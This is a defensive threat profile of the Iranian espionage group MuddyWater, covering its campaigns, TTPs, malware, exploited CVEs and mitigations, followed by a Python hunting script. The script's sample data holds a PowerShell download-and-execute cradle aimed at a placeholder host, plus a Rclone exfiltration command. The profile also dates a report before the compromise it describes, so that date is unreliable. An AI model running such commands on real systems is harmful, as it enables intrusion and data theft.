active threat profile
type State-Sponsored / Espionage
threat_level High (escalating)
status Active — confirmed Mar 2026
origin Iran (MOIS)
last_updated 2026-03-13

MuddyWater

aliases: Seedworm (Symantec), Mango Sandstorm (Microsoft), MERCURY (Microsoft legacy), Static Kitten (CrowdStrike), TA450 (Proofpoint), TEMP.Zagros (FireEye), Earth Vetala (Trend Micro), Boggy Serpens (Palo Alto), COBALT ULSTER (Secureworks), ATK51

An Iranian state-sponsored advanced persistent threat group operating under the Ministry of Intelligence and Security (MOIS) since at least 2017. MuddyWater is one of Iran's operationally active cyber espionage units, distinguished by its heavy reliance on PowerShell-based tradecraft, rapid adoption of new tools and programming languages, abuse of legitimate remote management software, and social engineering-driven initial access. The group targets government agencies, defense contractors, telecommunications providers, financial institutions, energy companies, and critical infrastructure across the Middle East, North America, Europe, Africa, and Central/South Asia. In a significant escalation, Amazon Threat Intelligence correlated MuddyWater's compromise of surveillance camera infrastructure in 2025 with subsequent Iranian missile strikes, establishing a direct operational link between the group's cyber operations and kinetic military actions. As of March 2026, MuddyWater is confirmed active on the networks of US organizations including banks, airports, and defense-aerospace software suppliers, deploying its newest backdoor, Dindoor, amid the ongoing US-Israel-Iran conflict.

attributed origin Iran — Ministry of Intelligence and Security (MOIS)
organization type State-Sponsored APT / Cyber Espionage
active since ~2017 (possibly earlier)
primary motivation Espionage / Intelligence Collection / Pre-positioning
operating environment Windows (primary); Android (mobile surveillance)
mitre att&ck group G0069
government advisories FBI/CISA/CNMF/NCSC-UK Joint Advisory (Feb 2022)
current status Highly active — confirmed compromises Mar 2026
latest malware Dindoor (Deno JS), RustyWater (Rust), Fakeset (Python)

Overview

MuddyWater is a subordinate element of Iran's Ministry of Intelligence and Security (MOIS), formally attributed by the FBI, CISA, the US Cyber National Mission Force (CNMF), and the UK's National Cyber Security Centre (NCSC) in a joint advisory published in February 2022. The group has been conducting cyber espionage campaigns on behalf of Iranian intelligence since approximately 2017, though its origins may predate the first public reporting. Unlike many APT groups that rely on a stable toolkit, MuddyWater is characterized by constant evolution — rapidly adopting new programming languages, developing custom command-and-control frameworks, and layering in legitimate remote administration tools to maintain access while minimizing detection.

The group's operational signature centers on PowerShell. Early campaigns relied on POWERSTATS, a slowly evolving PowerShell-based first-stage backdoor. Over time, MuddyWater expanded into multi-language malware development spanning PowerShell, Python, VBScript, Go, Rust, and JavaScript (Deno runtime), while maintaining PowerShell as the connective tissue across its kill chain. The group's C2 infrastructure has progressed through multiple custom frameworks: MuddyC3, PowGoop, PhonyC2, and MuddyC2Go, each building on the last while incorporating lessons from public exposure. Throughout all of these evolutions, social engineering remains the primary initial access method, enabling MuddyWater to compromise fully patched systems where technical exploitation alone would fail.

A defining characteristic of MuddyWater's operations is the documented link between cyber espionage and kinetic military action. In November 2024, Amazon Threat Intelligence reported that MuddyWater had compromised a server containing live CCTV streams from Jerusalem in May 2025, allowing Iranian intelligence to surveil the city for potential targets. On June 23, 2025, Iran launched missile strikes against Jerusalem. Israeli authorities reported that Iranian forces were exploiting compromised security cameras to collect real-time intelligence and adjust missile targeting. This correlation between cyber access and kinetic strike represents a significant escalation in how nation-state cyber operations translate into physical military impact.

Current Activity (2026)

As of March 2026, MuddyWater is confirmed active on the networks of multiple US organizations. Broadcom's Symantec and Carbon Black threat hunting team reported in early March 2026 that the group has been present inside victim networks since at least early February 2026, with activity increasing following US-Israeli military strikes on Iran. Confirmed compromises include a US bank, a US airport, a non-governmental organization operating in the US and Canada, and the Israeli branch of a US software company supplying the defense and aerospace industry. The campaign deployed a previously unknown backdoor called Dindoor, which uses the Deno JavaScript runtime for execution, alongside the Python-based Fakeset backdoor and data exfiltration via Rclone to Wasabi cloud storage. Simultaneous campaigns by other Iranian APTs (Agrius, Charming Kitten, OilRig, Elfin, Fox Kitten) have been reported, suggesting coordinated Iranian cyber operations during the ongoing conflict. Check Point documented surges in surveillance camera exploitation against Israel and Gulf states using MuddyWater-attributed infrastructure.

Target Profile

MuddyWater's targeting reflects Iran's strategic intelligence requirements, with a primary focus on Middle Eastern states (particularly Israel, Saudi Arabia, Turkey, UAE, Jordan, Iraq) and secondary targeting of Western nations whose policies affect Iranian interests. The group has expressed interest in Five Eyes countries, with recent campaigns confirming active operations against US critical infrastructure.

  • Government & Defense: Government agencies, defense contractors, aerospace suppliers, and military organizations across the Middle East, North America, and Europe. The 2026 campaign specifically targeted a US defense-aerospace software supplier's Israeli operations.
  • Telecommunications: Carriers and telecom infrastructure across the Middle East, enabling potential surveillance capabilities through carrier-level access.
  • Financial Services: Banks and financial institutions, with confirmed compromises of US banking networks in 2026.
  • Critical Infrastructure: Energy, transportation (airports), maritime, and surveillance systems. The CCTV camera compromise campaign demonstrates targeting of physical security infrastructure to support military operations.
  • Academia & Think Tanks: Research institutions and policy organizations, including the 2023 attack on Israel's Technion Institute. Credential harvesting campaigns against US academics and policy experts specializing in Iran documented through 2025.
  • Geographic Focus: Primary: Israel, Turkey, Saudi Arabia, Jordan, Iraq, UAE, Kuwait, Bahrain, Lebanon. Secondary: United States, Canada, United Kingdom, India, Egypt, Sudan, Tanzania, Central/South Asia, and EMEA broadly.

Tactics, Techniques & Procedures

MuddyWater's TTPs reflect one of the broadest and most rapidly evolving tradecraft profiles in the Iranian APT ecosystem. The following is mapped to MITRE ATT&CK Group G0069 with additional techniques documented by Symantec, Check Point, ESET, Deep Instinct, CloudSEK, Sophos, and the Israel National Cyber Directorate.

mitre id | technique | description
T1566.001 | Phishing: Spearphishing Attachment | Primary initial access vector throughout MuddyWater's operational history. Sends targeted emails with malicious macro-enabled Office documents (.doc, .docx, .xls), HTML applications (.hta), or ZIP archives containing disguised executables. Lures are contextually relevant, often impersonating trusted organizations or referencing current events. Hebrew-language decoy documents targeting Israeli government/military are common. Recent campaigns use PDFs with embedded links to download backdoors (BugSleep) or ZIP archives containing legitimate PDFs alongside disguised malware executables.
T1059.001 | Command and Scripting Interpreter: PowerShell | MuddyWater's defining technical characteristic. PowerShell is used at every stage of the kill chain: initial payload execution, persistence, defense evasion, credential access, lateral movement, and C2 communication. The group's custom frameworks (MuddyC3, PhonyC2, PowGoop) are all PowerShell-driven. AMSI and ETW bypass techniques are incorporated in newer payloads. Multi-layer obfuscation including base64 encoding, string concatenation, and variable substitution is used extensively.
T1219 | Remote Access Software | Extensive abuse of legitimate remote management tools for persistence and lateral movement, making detection significantly harder as the traffic blends with normal enterprise administration. Known tools include SimpleHelp (primary, downloaded from the official website), ConnectWise (ScreenConnect), RemoteUtilities, Atera Agent, and AnyDesk. SimpleHelp runs as a system service, surviving reboots and providing administrator-level command execution.
T1190 | Exploit Public-Facing Application | Rapidly adopts public exploit code and modifies it for operational deployment at scale. Exploited vulnerabilities include PaperCut (CVE-2023-27350), ManageEngine, Microsoft Exchange, and multiple IP camera vulnerabilities (CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, CVE-2021-33044) targeting Dahua and Hikvision surveillance systems. Password spraying campaigns against cloud identity services are documented alongside vulnerability exploitation.
T1071 | Application Layer Protocol | C2 communications via HTTPS, Telegram APIs (encrypted channel for the Small Sieve backdoor), and Ethereum blockchain-based C2 resolution (a novel technique). Custom C2 frameworks generate randomized UUIDs for URL paths to complicate tracking. The Dindoor backdoor uses the Deno JavaScript runtime for C2 execution. Multiple exfiltration channels span cloud storage (Rclone to Wasabi/Mega) and EC2 instances.
T1055 | Process Injection | The BugSleep loader injects encrypted shellcode into the memory of running browser and application processes including Edge, Chrome, Opera, AnyDesk, OneDrive, and PowerShell. RustyWater (Rust-based implant) uses anti-debugging techniques and process injection for defense evasion. Injection into trusted processes provides execution within a legitimate process context.
T1003 | OS Credential Dumping | A custom Chromium-based credential stealer targets stored passwords and session data from Chrome, Opera, Brave, and Edge browsers. LaZagne and Mimikatz variants are used for broader credential harvesting. Credential data supports lateral movement and is used in follow-on spearphishing campaigns from compromised enterprise email environments.
T1588.002 | Obtain Capabilities: Tool | Procures and deploys legitimate tools (SimpleHelp, ConnectWise, Ligolo) alongside custom malware. Uses Metasploit for exploitation. Cobalt Strike observed in some campaigns. This layered approach of custom + commercial + open-source tools creates detection challenges, as defenders must distinguish malicious from legitimate use of the same applications.
T1567 | Exfiltration Over Web Service | Uses Rclone to exfiltrate stolen data to cloud storage services (Wasabi buckets in 2026 campaigns, Mega in earlier operations). Egnyte-hosted pages are used for payload staging and distribution in phishing campaigns. Cloud-based exfiltration blends with normal enterprise traffic patterns.
T1547.001 | Boot or Logon Autostart: Registry Run Keys | Establishes persistence via Windows Registry modifications. RustyWater creates registry run keys after initial execution. SimpleHelp persists through system service installation. Multiple persistence mechanisms are deployed simultaneously for redundancy.
T1140 | Deobfuscate/Decode Files or Information | Multi-layer obfuscation across all payloads. PowerShell scripts use variable substitution, string manipulation, and encoded commands. BugSleep extracts encrypted configuration files post-deployment and uses AES-encrypted C2 communications. The PhonyC2 framework generates randomized UUIDs for C2 URL paths to defeat static detection.

Known Campaigns

Early POWERSTATS Campaigns 2017 – 2019

MuddyWater's initial campaigns used spearphishing with macro-enabled Office documents to deliver the POWERSTATS first-stage PowerShell backdoor. Targets included government and telecommunications entities across the Middle East, with operations expanding to Asia, Europe, and North America. The campaigns established MuddyWater's reputation for PowerShell-heavy tradecraft and social engineering-first initial access. Despite broad public reporting and scrutiny, the group continued operations with only incremental tool modifications.

PhonyC2 and Technion Institute Attack 2023

Deep Instinct discovered the PhonyC2 command-and-control framework, a custom PowerShell-based C2 that evolved from MuddyC3. The framework was used in the attack against Israel's Technion — Israel Institute of Technology, one of the country's premier research universities. PhonyC2's source code was inadvertently exposed, revealing the framework's architecture, including randomized UUID URL generation, configurable decoy delivery, and integration with Ligolo tunneling. The framework was used concurrently in campaigns exploiting the PaperCut vulnerability (CVE-2023-27350).

BugSleep Backdoor Deployment MID-2024

Check Point Research documented MuddyWater deploying BugSleep, a new backdoor still under active development designed to execute commands and facilitate file transfers. Delivered via spearphishing PDFs with embedded links, BugSleep incorporated delayed execution (sandbox evasion), encrypted C2 communications calling every 30 minutes, and process injection into running browser and application memory. The shift from phishing-to-Atera-RMM to phishing-to-custom-backdoor represented a significant tactical evolution. Activity intensified after the October 2023 Israel-Hamas conflict.

MuddyViper Campaign (Israel) SEP 2024 – MAR 2025

ESET researchers documented the MuddyViper backdoor deployed against Israeli organizations over a six-month campaign. The operation coincided with the broader escalation of the Israel-Iran cyber conflict and included updated Android spyware (DCHSpy) for mobile surveillance during the Israel-Iran military confrontations.

CCTV Compromise & Cyber-Enabled Kinetic Targeting MAY – JUN 2025

Amazon Threat Intelligence reported that MuddyWater compromised a server hosting live CCTV feeds from Jerusalem in May 2025. On June 23, 2025 — during the "Twelve-Day War" between Iran and Israel — Iran launched missile strikes against the city. Israeli authorities confirmed that Iranian forces were exploiting compromised surveillance cameras for real-time intelligence collection and missile targeting adjustments. This campaign established a documented correlation between MuddyWater's cyber operations and physical military strikes. In parallel, Check Point documented surges in IP camera exploitation targeting Israel and Gulf states (UAE, Qatar, Bahrain, Kuwait) using infrastructure attributed to MuddyWater, weaponizing vulnerabilities in Dahua and Hikvision cameras. Researchers assessed that tracking camera-targeting activity from MuddyWater infrastructure may serve as an early indicator of follow-on kinetic operations.

RustyWater: Rust-Based Implant Campaign EARLY 2026

CloudSEK's TRIAD team identified a spearphishing campaign deploying RustyWater, a Rust-based remote access trojan representing a significant evolution from MuddyWater's traditional PowerShell and VBScript toolkit. The campaign targeted diplomatic, maritime, financial, and telecom entities across the Middle East, with primary focus on Israeli organizations using Hebrew-language decoy documents. RustyWater featured modular architecture, anti-debugging techniques, and process injection, deployed via ZIP archives containing legitimate PDFs alongside disguised executables. Indicators suggested expansion to India, UAE, and other regional targets.

Dindoor: US Critical Infrastructure Campaign FEB – MAR 2026

MuddyWater's most consequential active campaign as of March 2026. Broadcom's Symantec and Carbon Black team confirmed the group had been present inside US networks since early February 2026, with activity intensifying following US-Israeli military strikes on Iran. Confirmed compromises include a US bank, a US airport, a US/Canadian NGO, and the Israeli branch of a US defense-aerospace software supplier. The campaign deployed Dindoor, a previously unknown backdoor leveraging the Deno JavaScript runtime for execution, alongside the Python-based Fakeset backdoor. Data exfiltration used Rclone to Wasabi cloud storage buckets. Researchers described the operation as notable not for any single tool's sophistication but for its breadth: multiple custom C2 frameworks, exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels.

Tools & Malware

MuddyWater maintains one of the broadest and most rapidly evolving toolkits of any state-sponsored APT group, spanning custom malware, custom C2 frameworks, legitimate remote administration tools, and open-source offensive tools. The group develops in PowerShell, Python, VBScript, Go, Rust, and JavaScript.

  • Dindoor (2026): Newest backdoor leveraging the Deno JavaScript runtime for execution. Deployed against US banks, airports, and defense-aerospace suppliers. Capable of command execution on compromised systems. Represents the group's continued expansion into new runtime environments.
  • RustyWater (2026): Rust-based remote access trojan with modular architecture, anti-debugging capabilities, process injection, and registry-based persistence. Deployed via spearphishing with ZIP archives containing decoy PDFs. CloudSEK described it as "a significant upgrade to their traditional toolkit."
  • Fakeset (2026): Python-based backdoor deployed alongside Dindoor in the US critical infrastructure campaign. Details limited in current public reporting.
  • BugSleep (2024): Custom backdoor for command execution and file transfer, still under active development when deployed. Features delayed execution (sandbox evasion), encrypted configuration extraction, AES-encrypted C2 communications at 30-minute intervals, and process injection into browser and application memory (Edge, Chrome, Opera, AnyDesk, OneDrive, PowerShell).
  • MuddyViper (2024-2025): Backdoor deployed against Israeli organizations over a sustained six-month campaign. Documented by ESET.
  • PhonyC2 (2023): Custom PowerShell-based command-and-control framework evolving from MuddyC3. Used in the Technion attack and PaperCut exploitation campaigns. Generates randomized UUIDs for C2 URL paths. Source code was inadvertently exposed, revealing architecture details.
  • MuddyC2Go (2023-2024): Go-based C2 framework replacing earlier PowerShell-only frameworks. Reflects the group's gradual migration toward compiled languages for core infrastructure.
  • POWERSTATS / POWGOOP: Long-running PowerShell-based first-stage backdoors used from 2017 through 2022+. PowGoop served as a DLL loader with C2 URL patterns incorporating "Core?Token=" paths. POWERSTATS was MuddyWater's original signature tool, evolving slowly despite public exposure.
  • Small Sieve (2021): Python-based backdoor using Telegram APIs for encrypted C2 communications. Documented in NCSC-UK malware analysis report.
  • StarWhale / Canopy / Mori: VBScript and Windows-based implants used in various campaigns. Part of MuddyWater's diverse toolkit maintaining options across multiple programming languages.
  • DCHSpy: Android mobile surveillance malware deployed during the Israel-Iran conflict for mobile intelligence collection.
  • Chromium-Based Credential Stealer: Custom tool targeting stored credentials and session data from Chrome, Opera, Brave, and Edge browsers.
  • SimpleHelp / ConnectWise / RemoteUtilities / Atera: Legitimate remote administration tools abused for persistence and lateral movement. SimpleHelp is the primary tool, downloaded from the official website, installed as a system service, and providing administrator-level command execution that survives reboots.
  • Rclone: Used for data exfiltration to cloud storage (Wasabi buckets in 2026, Mega in earlier campaigns). Egnyte used for payload staging in phishing workflows.
  • Ligolo / Metasploit / Cobalt Strike: Open-source and commercial offensive tools used for tunneling, exploitation, and post-exploitation operations.

Indicators of Compromise

MuddyWater constantly rotates infrastructure and develops new tools. IOCs have a short shelf life. The following are sourced from the March 2026 Symantec/Carbon Black report, CloudSEK, Check Point, and ESET research.

behavioral indicators
  • Spearphishing with ZIP archives containing legitimate PDF decoys alongside disguised executable payloads with PDF icons
  • SimpleHelp remote management tool installed as a system service for persistent administrative access — downloaded from the official website
  • Rclone data exfiltration to Wasabi cloud storage buckets (2026) or Mega (earlier campaigns)
  • Multi-layer PowerShell obfuscation with AMSI and ETW bypass techniques in newer payloads
  • Process injection into browser memory (Edge, Chrome, Opera) and legitimate applications (AnyDesk, OneDrive)
  • Ethereum blockchain-based C2 domain resolution (novel technique observed in 2026 campaigns)
  • Compromise of Dahua and Hikvision IP cameras for surveillance and battle damage assessment in conflict zones

exploited vulnerabilities
  • CVE-2023-27350 — PaperCut NG/MF RCE (used with PhonyC2 framework)
  • CVE-2017-7921 — Hikvision IP camera authentication bypass
  • CVE-2023-6895 — IP camera vulnerability (surveillance targeting)
  • CVE-2021-36260 — Hikvision command injection
  • CVE-2025-34067 — IP camera vulnerability (2025 conflict exploitation)
  • CVE-2021-33044 — Dahua IP camera authentication bypass
  • Multiple novel SQL injection vulnerabilities — identified in March 2026 campaign (details pending full disclosure)

Mitigation & Defense

MuddyWater's combination of social engineering, legitimate tool abuse, and multi-language malware development creates a challenging detection environment. Recommendations are informed by CISA/FBI advisory guidance, Symantec/Carbon Black, Check Point, and the Israel National Cyber Directorate.

  • Deploy phishing-resistant MFA on all externally facing services: Use FIDO2/hardware security keys for high-value accounts. MuddyWater's primary initial access is spearphishing combined with credential harvesting. Standard MFA can be intercepted; hardware-bound credentials cannot be phished.
  • Whitelist authorized remote management tools: MuddyWater's abuse of SimpleHelp, ConnectWise, Atera, and RemoteUtilities means that detecting malicious activity requires distinguishing unauthorized from authorized remote access. Implement allowlists for approved RMM tools and block all others. Monitor for SimpleHelp installations not initiated by the IT helpdesk.
  • Patch internet-facing systems within 48 hours of critical disclosure: MuddyWater rapidly adopts public exploit code. Prioritize patching for Exchange, VPN gateways (Citrix, Fortinet), ManageEngine, PaperCut, and IP camera firmware (Dahua, Hikvision). The group has exploited over a dozen CVEs in recent campaigns.
  • Monitor for anomalous PowerShell activity: PowerShell is the connective tissue of MuddyWater's kill chain. Enable PowerShell script block logging, constrained language mode, and AMSI integration. Alert on encoded PowerShell commands, unusual script execution patterns, and PowerShell processes connecting to external IP addresses.
  • Secure IP camera and IoT infrastructure: MuddyWater's targeting of Dahua and Hikvision cameras for surveillance and kinetic targeting support is a unique threat. Segment surveillance camera networks from corporate infrastructure. Patch camera firmware promptly. Monitor for unauthorized access to CCTV management systems.
  • Implement cloud exfiltration detection: Monitor for Rclone execution and large outbound transfers to cloud storage services (Wasabi, Mega). Alert on Egnyte-hosted page access from enterprise endpoints. Enforce egress filtering and proxy controls on cloud storage destinations.
  • Monitor Entra ID sign-in logs for password spray patterns: MuddyWater conducts password spraying campaigns against cloud identity services. Alert on high failure volume, suspicious user-agent strings (go-http-client), and authentication attempts from Tor exit nodes.
  • Hunt for pre-positioning indicators: Given MuddyWater's documented pattern of establishing access months before activation, organizations in financial services, defense, aerospace, and transportation sectors should proactively hunt for indicators of persistent access including unusual remote management tool installations, registry persistence mechanisms, and encrypted outbound communications to unfamiliar cloud services.
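The following is an added example, not code from the profile or from any of the vendors it cites, showing how four of the detections recommended above can be expressed as simple hunting rules over endpoint and identity telemetry: decoding PowerShell -EncodedCommand invocations, flagging Rclone runs whose destination is a cloud storage provider named in this profile, flagging RMM installers that are either not on the organization's allowlist or not run by the helpdesk, and flagging password-spray patterns in cloud sign-in logs (one source IP failing against many distinct accounts, with the go-http-client user agent as a corroborating signal). All telemetry, field names, host names, IP addresses (TEST-NET ranges), the RMM allowlist, the helpdesk account and the spray thresholds are constructed assumptions for an example environment; real SIEM schemas and thresholds will differ.

```python
"""Added example: hunting rules for four behaviours from the mitigation list.
All telemetry below is constructed; field names, allowlists and thresholds are
assumptions about an example environment, not output of any real product.
"""
import base64
import re
from collections import defaultdict

# Assumptions about the example environment.
APPROVED_RMM = {"teamviewer"}                 # RMM products this org actually licenses
HELPDESK_ACCOUNTS = {"corp\\svc-helpdesk"}    # accounts allowed to install RMM software
# RMM products named in the profile plus the org's approved one (image-name substrings).
RMM_PRODUCTS = ("simplehelp", "screenconnect", "remoteutilities", "ateraagent",
                "anydesk", "teamviewer")
CLOUD_STORAGE_HOSTS = ("wasabisys.com", "mega.nz", "mega.io")
SPRAY_MIN_ACCOUNTS = 10   # distinct accounts failed from one IP
SPRAY_MIN_FAILURES = 20   # total failures from that IP

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_powershell(cmdline):
    """Return the script behind -EncodedCommand, or None if the command line is
    not encoded. PowerShell base64-encodes UTF-16LE text, so decode with that codec."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable encoded command>"


def hunt_process_events(events):
    """Apply the three process-level rules; each finding names the rule that fired."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        cmd = ev["cmdline"]
        if image.endswith(("powershell.exe", "pwsh.exe")):
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                findings.append({"rule": "encoded_powershell", "host": ev["host"], "decoded": decoded})
        # Rclone itself is legitimate; the destination is what matters.
        target = cmd + " " + ev.get("dest_host", "")
        if image.endswith("rclone.exe") and any(h in target for h in CLOUD_STORAGE_HOSTS):
            findings.append({"rule": "rclone_cloud_exfil", "host": ev["host"], "cmdline": cmd})
        product = next((p for p in RMM_PRODUCTS if p in image), None)
        if product and (product not in APPROVED_RMM or ev["user"].lower() not in HELPDESK_ACCOUNTS):
            findings.append({"rule": "unapproved_rmm_install", "host": ev["host"],
                             "product": product, "user": ev["user"]})
    return findings


def detect_password_spray(signins):
    """Group failed cloud sign-ins by source IP and flag IPs that fail against many
    distinct accounts; record whether the go-http-client user agent was seen."""
    by_ip = defaultdict(lambda: {"accounts": set(), "failures": 0, "agents": set()})
    for rec in signins:
        if rec["result"] != "failure":
            continue
        s = by_ip[rec["src_ip"]]
        s["accounts"].add(rec["user"].lower())
        s["failures"] += 1
        s["agents"].add(rec["user_agent"])
    alerts = []
    for ip, s in by_ip.items():
        if len(s["accounts"]) >= SPRAY_MIN_ACCOUNTS and s["failures"] >= SPRAY_MIN_FAILURES:
            alerts.append({"rule": "password_spray", "src_ip": ip,
                           "accounts": len(s["accounts"]), "failures": s["failures"],
                           "suspicious_agent": any("go-http-client" in a.lower() for a in s["agents"])})
    return alerts


# Constructed sample telemetry (not real logs). The encoded blob is built here so
# the test can check the round trip; 203.0.113.0/24 and 198.51.100.0/24 are TEST-NET.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_PROCESS_EVENTS = [
    {"host": "ws-finance-07", "user": "corp\\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED},
    {"host": "ws-finance-07", "user": "corp\\jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "cmdline": "rclone.exe copy C:\\Finance\\Q1 remote:bucket-x", "dest_host": "s3.wasabisys.com"},
    {"host": "ws-finance-07", "user": "corp\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\SimpleHelp-Installer.exe", "cmdline": "SimpleHelp-Installer.exe /S"},
    {"host": "ws-it-01", "user": "corp\\svc-helpdesk",       # approved product, helpdesk: benign
     "image": r"C:\Temp\TeamViewer_Setup.exe", "cmdline": "TeamViewer_Setup.exe /S"},
    {"host": "ws-hr-02", "user": "corp\\asmith",              # ordinary PowerShell use: benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Service -Name Spooler"},
]
SAMPLE_SIGNINS = (
    [{"user": f"user{i:02d}@example.com", "src_ip": "198.51.100.7", "result": "failure",
      "user_agent": "Go-http-client/1.1"} for i in range(1, 26)]
    + [{"user": "user01@example.com", "src_ip": "192.0.2.5", "result": "failure", "user_agent": "Mozilla/5.0"},
       {"user": "user01@example.com", "src_ip": "192.0.2.5", "result": "success", "user_agent": "Mozilla/5.0"}]
)


def run_hunt():
    """Run every rule over the constructed samples and return the combined findings."""
    return {"process": hunt_process_events(SAMPLE_PROCESS_EVENTS),
            "identity": detect_password_spray(SAMPLE_SIGNINS)}


if __name__ == "__main__":
    for section, items in run_hunt().items():
        for item in items:
            print(section, item)
```

On the sample data the process rules fire three times (the encoded PowerShell, with the cradle decoded to plain text; the Rclone copy to a Wasabi endpoint; and the SimpleHelp installer run by a non-helpdesk user) and stay silent on the helpdesk's approved TeamViewer install and the ordinary Get-Service call, while the identity rule flags 198.51.100.7 for 25 failures across 25 accounts with the go-http-client agent. In production the encoded-command rule should run on process-creation telemetry with full command lines (for example Sysmon Event ID 1 or Windows 4688 with command-line auditing), and the spray thresholds should be tuned to the tenant's normal failure rate so that a single locked-out user does not trip it.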

Iranian Cyber Ecosystem Context

MuddyWater operates within Iran's broader cyber apparatus, which is divided between two primary intelligence organizations:

  • MOIS (Ministry of Intelligence and Security): MuddyWater's parent organization. Other MOIS-attributed groups include OilRig/APT34, Agrius, and Void Manticore. MOIS groups tend to focus on espionage, intelligence collection, and surveillance, with operational overlap and infrastructure sharing between groups.
  • IRGC-IO (Islamic Revolutionary Guard Corps — Intelligence Organization): Operates groups like Charming Kitten/APT42, APT33/Elfin, and Fox Kitten. IRGC groups have broader mandates including influence operations, disruptive attacks, and surveillance of diaspora communities.

Research from Trellix, Picus, and multiple threat intelligence firms documents significant TTP overlap, infrastructure sharing, and operational coordination between MOIS and IRGC groups during escalated conflict periods. During the current US-Israel-Iran conflict (2025-2026), simultaneous campaigns by MuddyWater, Charming Kitten, OilRig, Elfin, Fox Kitten, and affiliated hacktivist fronts have been reported, suggesting centralized coordination of Iran's cyber operations.

Sources & Further Reading

— end of profile